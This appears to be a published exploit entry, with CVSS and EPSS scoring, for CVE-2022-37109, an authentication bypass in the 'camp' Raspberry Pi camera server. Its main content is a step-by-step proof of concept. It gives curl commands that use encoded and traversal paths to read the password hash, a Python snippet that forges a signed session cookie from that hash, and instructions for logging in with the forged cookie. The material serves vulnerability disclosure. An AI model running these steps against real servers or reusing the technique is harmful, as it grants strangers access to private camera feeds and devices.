9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.7 High
AI Score
Confidence
High
0.013 Low
EPSS
Percentile
85.6%
# Exploit Title: "camp" Raspberry Pi camera server 1.0 - Authentication Bypass
# Date: 2022-07-25
# Exploit Author: Elias Hohl
# Vendor Homepage: https://github.com/patrickfuller
# Software Link: https://github.com/patrickfuller/camp
# Version: < bf6af5c2e5cf713e4050c11c52dd4c55e89880b1
# Tested on: Ubuntu 20.04
# CVE : CVE-2022-37109
"camp" Raspberry Pi camera server Authentication Bypass vulnerability
https://medium.com/@elias.hohl/authentication-bypass-vulnerability-in-camp-a-raspberry-pi-camera-server-477e5d270904
1. Start an instance of the "camp" server:
python3 server.py --require-login
2. Fetch the SHA-512 password hash using one of these methods:
curl http://localhost:8000/static/password.tx%74
OR
curl http://localhost:8000/static/./password.txt --path-as-is
OR
curl http://localhost:8000/static/../camp/password.txt --path-as-is
3. Execute the following python snippet (replace the hash with the hash you received in step 2).
from tornado.web import create_signed_value
import time
print(create_signed_value("5895bb1bccf1da795c83734405a7a0193fbb56473842118dd1b66b2186a290e00fa048bc2a302d763c381ea3ac3f2bc2f30aaa005fb2c836bbf641d395c4eb5e", "camp", str(time.time())))
4. In the browser, navigate to http://localhost:8000/, add a cookie named "camp" and set the value to the result of the script from step 3, then reload the page. You will be logged in.
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.7 High
AI Score
Confidence
High
0.013 Low
EPSS
Percentile
85.6%